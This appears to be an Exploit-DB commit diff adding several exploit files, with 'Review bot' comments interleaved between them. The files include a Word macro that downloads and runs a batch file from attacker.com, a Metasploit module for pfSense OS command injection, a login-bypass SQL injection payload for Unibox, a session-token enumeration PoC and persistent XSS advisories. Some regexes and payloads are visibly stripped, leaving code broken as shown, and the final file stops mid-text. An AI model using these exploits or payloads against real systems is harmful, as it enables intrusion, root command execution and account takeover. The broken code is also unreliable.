From 98cdb051068f442c05d9c11f507a02a5bb7c3b61 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 21 Jul 2023 00:16:29 +0000 Subject: [PATCH] DB: 2023-07-21 10 changes to exploits/shellcodes/ghdb Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. RWS WorldServer 11.7.3 - Session Token Enumeration Aures Booking & POS Terminal - Local Privilege Escalation Boom CMS v8.0.7 - Cross Site Scripting PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities pfSense v2.7.0 - OS Command Injection Webile v1.0.1 - Multiple Cross Site Scripting Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection RaidenFTPD 2.4.4005 - Buffer Overflow (SEH) --- exploits/multiple/remote/51609.txt | 43 +++++ exploits/multiple/webapps/51619.txt | 176 +++++++++++++++++++ exploits/php/webapps/51608.rb | 244 ++++++++++++++++++++++++++ exploits/php/webapps/51610.txt | 111 ++++++++++++ exploits/php/webapps/51612.txt | 206 ++++++++++++++++++++++ exploits/php/webapps/51616.txt | 240 ++++++++++++++++++++++++++ exploits/php/webapps/51617.txt | 185 ++++++++++++++++++++ exploits/php/webapps/51618.txt | 257 ++++++++++++++++++++++++++++ exploits/windows/local/51611.py | 59 +++++++ files_exploits.csv | 9 + 10 files changed, 1530 insertions(+) create mode 100644 exploits/multiple/remote/51609.txt create mode 100644 exploits/multiple/webapps/51619.txt create mode 100755 exploits/php/webapps/51608.rb create mode 100644 exploits/php/webapps/51610.txt create mode 100644 exploits/php/webapps/51612.txt create mode 100644 exploits/php/webapps/51616.txt create mode 100644 exploits/php/webapps/51617.txt create mode 100644 exploits/php/webapps/51618.txt create mode 100755 exploits/windows/local/51611.py diff --git a/exploits/multiple/remote/51609.txt b/exploits/multiple/remote/51609.txt new file mode 100644 index 000000000..a666ced0f --- /dev/null +++ b/exploits/multiple/remote/51609.txt 
@@ -0,0 +1,43 @@ +## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. +## Author: nu11secur1ty +## Date: 07.18.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office +## Reference: https://portswigger.net/web-security/access-control +## CVE-2023-33148 + + +## Description: +The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to +Elevation of Privilege. +The attacker can use this vulnerability to attach a very malicious +WORD file in the Outlook app which is a part of Microsoft Office 365 +and easily can trick the victim to click on it - opening it and +executing a very dangerous shell command, in the background of the +local PC. This execution is without downloading this malicious file, +and this is a potential problem and a very dangerous case! This can be +the end of the victim's PC, it depends on the scenario. + +## Staus: HIGH Vulnerability + +[+]Exploit: + +- Exploit Server: + +```vb +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s +https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat +&& .\salaries.bat", vbNormalFocus) +End Sub + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) + +## Time spend: +00:35:00 \ No newline at end of file diff --git a/exploits/multiple/webapps/51619.txt b/exploits/multiple/webapps/51619.txt new file mode 100644 index 000000000..201e0b090 --- /dev/null +++ b/exploits/multiple/webapps/51619.txt 
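Review bot: In 51609.txt the description contradicts the payload it ships: the text claims execution happens "without downloading this malicious file", yet the AutoOpen macro shown fetches a script with `curl -s https://attacker.com/... > salaries.bat` and then runs it, so a file is written to disk and that write (plus the child `cmd.exe` and `curl` from an Office process) is exactly what an endpoint sensor would flag. Either correct the description or explain what the "Elevation of Privilege" in the title consists of, because the PoC as written is a user-opened macro running in that user's own context and no privilege boundary is named. Minor: "Staus" should be "Status", "Time spend" should be "Time spent", and the Reference line points at a generic PortSwigger access-control page that does not support the CVE-2023-33148 claim.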
@@ -0,0 +1,176 @@ +Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration +Session tokens in RWS WorldServer have a low entropy and can be +enumerated, leading to unauthorised access to user sessions. + + +Details +======= + +Product: WorldServer +Affected Versions: 11.7.3 and earlier versions +Fixed Version: 11.8.0 +Vulnerability Type: Session Token Enumeration +Security Risk: high +Vendor URL: https://www.rws.com/localization/products/additional-solutions/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 +Advisory Status: published +CVE: CVE-2023-38357 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 + + +Introduction +============ + +"WorldServer offers a flexible, enterprise-class translation management +system that automates translation tasks and greatly reduces the cost of +supporting large volumes of local language content." + +(from the vendor's homepage) + + +More Details +============ + +WorldServer associates user sessions with numerical tokens, which always +are positive values below 2^31. The SOAP action "loginWithToken" allows +for a high amount of parallel attempts to check if a token is valid. +During analysis, many assigned tokens were found to be in the 7-digit +range of values. An attacker is therefore able to enumerate user +accounts in only a few hours. 
+ + +Proof of Concept +================ + +In the following an example "loginWithToken" request is shown: + +----------------------------------------------------------------------- +POST /ws/services/WSContext HTTP/1.1 +Content-Type: text/xml;charset=UTF-8 +SOAPAction: "" +Content-Length: 501 +Host: www.example.com +Connection: close +User-Agent: agent + + + + + + FUZZ + + + +----------------------------------------------------------------------- + +It can be saved as file "login-soap.req" and be used as a request +template for the command-line HTTP enumerator monsoon [1] to achieve +many parallel requests: + +----------------------------------------------------------------------- +$ monsoon fuzz --threads 100 \ +--template-file login-soap.req \ +--range 1-2147483647 \ +--hide-pattern "InvalidSessionException" \ +'https://www.example.com' + +Target URL: https://www.example.com/ + + status header body value extract + + 500 191 560 5829099 + 500 191 556 6229259 + 200 191 3702 7545136 + 500 191 556 9054984 +[...] +processed 12000000 HTTP requests in 2h38m38s +4 of 12000000 requests shown, 1225 req/s +----------------------------------------------------------------------- + +The --range parameter reflects the possible value range of 2^31 and for +each value an HTTP request is sent to the WorldServer SOAP API where the +FUZZ marker in the request template is replaced with the respective +value. Also responses are hidden which contain "InvalidSessionException" +as these sessions are invalid. Responses will yield a status code of 200 +if an administrative session token is found. For an unprivileged user +session, status code 500 is returned. + + +Workaround +========== + +Lower the rate at which requests can be issued, for example with a +frontend proxy. + + +Fix +=== + +According to the vendor, upgrading to versions above 11.8.0 resolves the +vulnerability. + + +Security Risk +============= + +Attackers can efficiently enumerate session tokens. 
In a penetration +test, it was possible to get access to multiple user accounts, including +administrative accounts using this method in under three hours. +Additionally, by using such an administrative account it seems likely to +be possible to execute arbitrary code on the underlying server by +customising the REST API [2]. Thus, the vulnerability poses a high risk. + + +Timeline +======== + +2023-03-27 Vulnerability identified +2023-03-30 Customer approved disclosure to vendor +2023-04-03 Requested security contact from vendor +2023-04-06 Vendor responded with security contact +2023-04-14 Advisory sent to vendor +2023-04-18 Vendor confirms vulnerability and states that it was already +known and fixed in version 11.8.0. +2023-07-03 Customer confirms update to fixed version +2023-07-05 CVE ID requested +2023-07-15 CVE ID assigned +2023-07-19 Advisory released + +References +========== + +[1] https://github.com/RedTeamPentesting/monsoon +[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. 
If you are interested please visit: +https://jobs.redteam-pentesting.de/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/51608.rb b/exploits/php/webapps/51608.rb new file mode 100755 index 000000000..942328401 --- /dev/null +++ b/exploits/php/webapps/51608.rb 
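Review bot: In 51619.txt the Fix section disagrees with the Details header: Details says "Fixed Version: 11.8.0", but Fix says "upgrading to versions above 11.8.0 resolves the vulnerability", which leaves 11.8.0 itself ambiguous; the timeline's vendor statement ("fixed in version 11.8.0") suggests the Details line is the correct one, so align the Fix wording with it. The example "loginWithToken" request is also incomplete as committed: the header declares `Content-Length: 501` while the body has been reduced to the bare `FUZZ` marker, so the SOAP envelope (the XML appears to have been stripped) must be restored before the file can serve as the monsoon template the text describes. Finally, the Workaround only lowers the request rate; it is worth stating that the root cause is token entropy, so rate limiting is a stopgap, and that a burst of responses containing "InvalidSessionException" is the detection signal this advisory itself points at.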
@@ -0,0 +1,244 @@ +# Exploit Title: pfSense v2.7.0 - OS Command Injection +#Exploit Author: Emir Polat +# CVE-ID : CVE-2023-27253 + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense Restore RRD Data Command Injection', + 'Description' => %q{ + This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of + pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" + privilege to execute arbitrary operating system commands as the "root" user. + + This module has been tested successfully on version 2.6.0-RELEASE. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Emir Polat', # vulnerability discovery & metasploit module + ], + 'References' => [ + ['CVE', '2023-27253'], + ['URL', 'https://redmine.pfsense.org/issues/13935'], + ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] + ], + 'DisclosureDate' => '2023-03-18', + 'Platform' => ['unix'], + 'Arch' => [ ARCH_CMD ], + 'Privileged' => true, + 'Targets' => [ + [ 'Automatic Target', {}] + ], + 'Payload' => { + 'BadChars' => "\x2F\x27", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic netcat' + } + }, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true + }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options [ + OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), + OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) + ] + end + + def check + unless login + return 
Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") + end + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? + return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 + + unless res&.body&.include?('Diagnostics: ') + return Exploit::CheckCode::Safe('Vulnerable module not reachable') + end + + version = detect_version + unless version + return Exploit::CheckCode::Detected('Unable to get the pfSense version') + end + + unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') + return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") + end + + Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") + end + + def login + # Skip the login process if we are already logged in. + return true if @logged_in + + csrf = get_csrf('index.php', 'GET') + unless csrf + print_error('Could not get the expected CSRF token for index.php when attempting login!') + return false + end + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + }, + 'keep_cookies' => true + ) + + if res && res.code == 302 + @logged_in = true + true + else + false + end + end + + def detect_version + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + # If the response isn't a 200 ok response or is an empty response, just return nil. 
+ unless res && res.code == 200 && res.body + return nil + end + + if (%r{Version.+(?[0-9.]+-RELEASE)\n?}m =~ res.body).nil? + nil + else + version + end + end + + def get_csrf(uri, methods) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, uri), + 'method' => methods, + 'keep_cookies' => true + ) + + unless res && res.body + return nil # If no response was returned or an empty response was returned, then return nil. + end + + # Try regex match the response body and save the match into a variable named csrf. + if (/var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body).nil? + return nil # No match could be found, so the variable csrf won't be defined. + else + return csrf + end + end + + def drop_config + csrf = get_csrf('diag_backup.php', 'GET') + unless csrf + fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') + end + + post_data = Rex::MIME::Message.new + + post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') + post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') + post_data.add_part('', nil, nil, 'form-data; name="restorearea"') + post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') + post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s, + 'keep_cookies' => true + ) + + if res && res.code == 200 && res.body =~ // + return res.body + else + return nil + end + end + + def exploit + unless login + fail_with(Failure::NoAccess, 'Could not obtain 
the login cookies!') + end + + csrf = get_csrf('diag_backup.php', 'GET') + unless csrf + fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') + end + + config_data = drop_config + if config_data.nil? + fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') + end + + if (%r{(?.*?)} =~ config_data).nil? + fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') + end + config_data.gsub!(' ', '${IFS}') + send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") + + post_data = Rex::MIME::Message.new + + post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') + post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') + post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') + post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") + post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') + post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s, + 'keep_cookies' => true + ) + + if res + print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") + end + end +end \ No newline at end of file 
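Review bot: In 51608.rb the named capture groups have lost their names, which makes the module fail as committed: `%r{Version.+(?[0-9.]+-RELEASE)\n?}m`, `/var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/` and `%r{(?.*?)}` are each missing the `(?<name>...)` part, so `version`, `csrf` and `file` are never defined, and `res.body =~ //` in drop_config matches every response rather than checking for the element that carries the filename. These look like angle brackets stripped in transit; restore the `version`, `csrf` and `file` group names and the XML tag in the last two regexes before this lands. The title and description also disagree: the title (and the commit message) say "pfSense v2.7.0", while the description says the bug affects pfSense "prior to version 2.7.0" and was tested on 2.6.0-RELEASE, so the title should say 2.6.0 or "< 2.7.0". Minor: "vulnerabilty" in the description.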
diff --git a/exploits/php/webapps/51610.txt b/exploits/php/webapps/51610.txt new file mode 100644 index 000000000..f068b034d --- /dev/null +++ b/exploits/php/webapps/51610.txt 
@@ -0,0 +1,111 @@ +# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection +# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" +# Date: 07/2023 +# Exploit Author: Ansh Jain @sudoark +# Author Contact : arkinux01@gmail.com +# Vendor Homepage: https://www.wifi-soft.com/ +# Software Link: +https://www.wifi-soft.com/products/unibox-hotspot-controller.php +# Version: Unibox Administration 3.0 & 3.1 +# Tested on: Microsoft Windows 11 +# CVE : CVE-2023-34635 +# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 + +The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to +SQL Injection, which can lead to unauthorised admin access for attackers. +The vulnerability occurs because of not validating or sanitising the user +input in the username field of the login page and directly sending the +input to the backend server and database. + +## How to Reproduce +Step 1 : Visit the login page and check the version, whether it is 3.0, +3.1, or not. +Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and +enter any random password. +Step 3 : Fill in the captcha and hit login. After hitting login, you have +been successfully logged in as an administrator and can see anyone's user +data, modify data, revoke access, etc. 
+ + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Login Request +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +----------------------------------------------------------------------------------------------------------------------- +Parameters: username, password, captcha, action +----------------------------------------------------------------------------------------------------------------------- + +POST /index.php HTTP/2 +Host: 255.255.255.255.host.com +Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 83 +Origin: https://255.255.255.255.host.com +Referer: https://255.255.255.255.host.com/index.php +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Login Response +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +HTTP/2 302 Found +Server: nginx +Date: Tue, 18 Jul 2023 13:32:14 GMT +Content-Type: text/html; charset=UTF-8 +Location: ./dashboard/dashboard +Expires: Thu, 
19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Successful Loggedin Request +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +GET /dashboard/dashboard HTTP/2 +Host: 255.255.255.255.host.com +Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://255.255.255.255.host.com/index.php +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Successful Loggedin Response +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +HTTP/2 200 OK +Server: nginx +Date: Tue, 18 Jul 2023 13:32:43 GMT +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Cache_control: private + + + + +html content + \ No newline at end of file diff --git a/exploits/php/webapps/51612.txt b/exploits/php/webapps/51612.txt new file mode 100644 index 000000000..ea4cc4e5b --- /dev/null +++ b/exploits/php/webapps/51612.txt 
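Review bot: In 51610.txt there is no fix or vendor-status line, so a reader cannot tell whether a patched Unibox release exists; add the vendor response (or "unpatched at time of publication") next to the CVE-2023-34635 reference. The root cause is already stated ("not validating or sanitising the user input in the username field ... directly sending the input to the backend server and database"), so the remediation to document is a parameterised query for the login lookup rather than input filtering. The evidence chain would also be clearer if the `Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d` shared by the login POST and the later `GET /dashboard/dashboard` were called out as the session that the 302 granted. Style: "Sql Injection" in the title should be "SQL Injection", as in the commit message, and "Successful Loggedin" should be "Successfully Logged In".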
@@ -0,0 +1,206 @@ +# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting +References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 +Release Date: 2023-07-03 +Vulnerability Laboratory ID (VL-ID): 2274 + +Product & Service Introduction: +=============================== +Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life +easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. +It gives editors control but doesn't require any technical knowledge. + +(Copy of the Homepage:https://www.boomcms.net/boom-boom ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. + + +Affected Product(s): +==================== +UXB London +Product: Boom v8.0.7 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-07-24: Researcher Notification & Coordination (Security Researcher) +2022-07-25: Vendor Notification (Security Department) +2023-**-**: Vendor Response/Feedback (Security Department) +2023-**-**: Vendor Fix/Patch (Service Developer Team) +2023-**-**: Security Acknowledgements (Security Department) +2023-07-03: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A persistent script code injection web vulnerability has been 
discovered in the official Boom CMS v8.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The vulnerability is located in the input fields of the album title and album description in the asset-manager module. +Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. +After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. +The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse +the content by usage of a backslash. Thus does not have any impact to inject own malicious +java-scripts because of its only performed for double- and single-quotes to prevent sql injections. + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] assets-manager (album) + +Vulnerable Function(s): +[+] add + +Vulnerable Parameter(s): +[+] title +[+] description + +Affected Module(s): +[+] Frontend (Albums) +[+] Backend (Albums Assets) + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Login to the application as restricted user +2. Create a new album +3. Inject a test script code payload to title and description +4. Save the request +5. 
Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution +6. Successful reproduce of the persistent cross site web vulnerability! + + +Payload(s): +>
test + + +--- PoC Session Logs (Inject) --- +https://localhost:8000/boomcms/album/35 +Host: localhost:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 263 +Origin:https://localhost:8000 +Connection: keep-alive +Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] +Sec-Fetch-Site: same-origin +{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", +"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" +:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} +- +PUT: HTTP/1.1 200 OK +Server: Apache +Cache-Control: no-cache, private +Set-Cookie: Max-Age=7200; path=/ +Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF +VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY +yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; +Max-Age=7200; path=/; httponly +Content-Length: 242 +Connection: Keep-Alive +Content-Type: application/json +- +https://localhost:8000/boomcms/asset-manager/albums/[evil.source] +Host: localhost:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF +VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY +yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; +- +GET: HTTP/1.1 200 OK +Server: Apache +Cache-Control: no-cache, private +Set-Cookie: +Vary: Accept-Encoding +Content-Length: 7866 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- + + 
+Vulnerable Source: asset-manager/albums/[ID] + +
  • + +
    +

    [MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]

    +

    "><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]>

    +

    0 assets

    +
    +
    +
  • +

    + + +
    +
    +
    +
    +

    <[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]>

    +

    <[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]>

    +
    + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. +Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability in the application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab \ No newline at end of file diff --git a/exploits/php/webapps/51616.txt b/exploits/php/webapps/51616.txt new file mode 100644 index 000000000..60ac9527d --- /dev/null +++ b/exploits/php/webapps/51616.txt 
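Review bot: In 51612.txt the Solution section recommends the wrong class of fix for what the Technical Details describe: the text itself notes the existing protection only backslash-escapes quotes "to prevent sql injections", which does nothing in an HTML context, so the fix should be contextual output encoding of the title and description wherever they are rendered (frontend albums and the backend assets listing), and "disallow usage of special chars" should be dropped because it is neither sufficient nor necessary. The Payload(s) section and the "Vulnerable Source" excerpt have been reduced to "test" and bare bullet fragments, so the PoC is not reproducible from this file as committed; the session log also carries a complete `laravel_session=` cookie value that should be redacted. Typos: "After the inject", "were the execute takes place", "Thus does not have any impact".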
@@ -0,0 +1,240 @@ +Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2321 + + +Release Date: +============= +2023-07-03 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2321 + + +Common Vulnerability Scoring System: +==================================== +5.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in +the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, +statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other +functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, +Windows, Linux, iOS, Android and other multi-platform operating systems. + +(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. 
